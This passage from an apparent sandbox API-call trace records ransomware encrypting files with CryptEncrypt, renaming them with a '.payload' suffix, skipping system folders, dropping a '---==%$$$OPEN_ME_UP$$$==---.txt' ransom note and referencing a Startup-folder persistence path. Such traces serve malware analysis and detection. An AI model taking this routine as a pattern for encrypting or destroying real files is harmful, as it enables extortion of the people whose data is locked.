liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.848] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.848] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.848] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.848] CloseHandle (hObject=0x438) returned 1 [0058.960] GetProcessHeap () returned 0x5e0000 [0058.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.961] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.961] GetProcessHeap () returned 0x5e0000 [0058.961] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.961] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.961] FindClose (in: hFindFile=0x606120 | out: hFindFile=0x606120) returned 1 [0058.961] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1037\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.961] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1037\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.962] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.962] CloseHandle (hObject=0x430) returned 1 [0058.963] GetProcessHeap () returned 0x5e0000 [0058.963] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.963] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1038", cAlternateFileName="")) returned 1 [0058.963] lstrcmpiW (lpString1="1038", lpString2="Windows") returned -1 [0058.963] lstrcmpiW (lpString1="1038", lpString2="$Recycle.bin") returned 1 [0058.963] lstrcmpiW (lpString1="1038", lpString2="System Volume Information") returned -1 [0058.963] lstrcmpiW (lpString1="1038", lpString2="Program Files") returned -1 [0058.963] lstrcmpiW (lpString1="1038", lpString2="Program Files (x86)") returned -1 [0058.963] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038") returned 30 [0058.963] lstrcmpW (lpString1="1038", lpString2=".") returned 1 [0058.963] lstrcmpW (lpString1="1038", lpString2="..") returned 1 [0058.963] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1038", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.963] GetProcessHeap () returned 0x5e0000 [0058.963] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.963] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\*") returned 32 [0058.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606260 [0058.963] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0058.963] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0058.963] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0058.963] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0058.963] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0058.963] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\.") returned 32 [0058.963] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.963] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0058.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0058.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0058.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0058.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0058.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0058.964] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\..") returned 33 [0058.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0058.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.964] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.964] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0058.964] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0058.964] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0058.964] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0058.964] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0058.964] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 39 [0058.964] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0058.964] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.964] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0058.964] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.964] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.964] GetTickCount () returned 0x114f2dd [0058.964] GetTickCount () returned 0x114f2dd [0058.964] GetTickCount () returned 0x114f2dd [0058.964] GetTickCount () returned 0x114f2dd [0058.964] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.965] GetProcessHeap () returned 0x5e0000 [0058.965] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.965] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x109e, lpOverlapped=0x0) returned 1 [0058.967] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffef62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.967] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x109e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x109e, lpOverlapped=0x0) returned 1 [0058.967] GetProcessHeap () returned 0x5e0000 [0058.967] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.967] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.967] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.968] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.968] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.968] CloseHandle (hObject=0x438) returned 1 [0058.968] GetProcessHeap () returned 0x5e0000 [0058.968] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.968] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0058.969] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0058.971] GetProcessHeap () returned 0x5e0000 [0058.971] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.971] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.971] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0058.971] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0058.971] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0058.971] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0058.971] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0058.971] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 48 [0058.971] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0058.971] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.971] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0058.971] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.971] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.971] GetTickCount () returned 0x114f2dd [0058.971] GetTickCount () returned 0x114f2dd [0058.971] GetTickCount () returned 0x114f2dd [0058.972] GetTickCount () returned 0x114f2dd [0058.972] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.972] GetProcessHeap () returned 0x5e0000 [0058.972] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.972] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.974] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.974] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.974] GetProcessHeap () returned 0x5e0000 [0058.974] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.974] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.974] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.974] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.974] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.974] CloseHandle (hObject=0x438) returned 1 [0058.977] GetProcessHeap () returned 0x5e0000 [0058.977] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.977] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0058.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0058.977] GetProcessHeap () returned 0x5e0000 [0058.977] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.977] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.977] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0058.977] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0058.977] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0058.977] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0058.977] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0058.978] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 49 [0058.978] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0058.978] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0058.978] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0058.978] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0058.978] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0058.978] GetTickCount () returned 0x114f2ed [0058.978] GetTickCount () returned 0x114f2ed [0058.978] GetTickCount () returned 0x114f2ed [0058.978] GetTickCount () returned 0x114f2ed [0058.978] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0058.979] GetProcessHeap () returned 0x5e0000 [0058.979] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0058.979] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.981] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.981] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0058.981] GetProcessHeap () returned 0x5e0000 [0058.981] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.981] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.981] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0058.981] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0058.982] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0058.982] CloseHandle (hObject=0x438) returned 1 [0058.983] GetProcessHeap () returned 0x5e0000 [0058.983] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0058.983] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0058.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0058.984] GetProcessHeap () returned 0x5e0000 [0058.984] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0058.984] FindNextFileW (in: hFindFile=0x606260, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.984] FindClose (in: hFindFile=0x606260 | out: hFindFile=0x606260) returned 1 [0058.984] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1038\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0058.984] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1038\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0058.984] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0058.986] CloseHandle (hObject=0x430) returned 1 [0058.986] GetProcessHeap () returned 0x5e0000 [0058.986] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0058.986] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1040", cAlternateFileName="")) returned 1 [0058.986] lstrcmpiW (lpString1="1040", lpString2="Windows") returned -1 [0058.986] lstrcmpiW (lpString1="1040", lpString2="$Recycle.bin") returned 1 [0058.986] lstrcmpiW (lpString1="1040", lpString2="System Volume Information") returned -1 [0058.986] lstrcmpiW (lpString1="1040", lpString2="Program Files") returned -1 [0058.986] lstrcmpiW (lpString1="1040", lpString2="Program Files (x86)") returned -1 [0058.986] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1040") returned 30 [0058.986] lstrcmpW (lpString1="1040", lpString2=".") returned 1 [0058.986] lstrcmpW (lpString1="1040", lpString2="..") returned 1 [0058.986] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1040", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0058.986] GetProcessHeap () returned 0x5e0000 [0058.986] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0058.986] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: 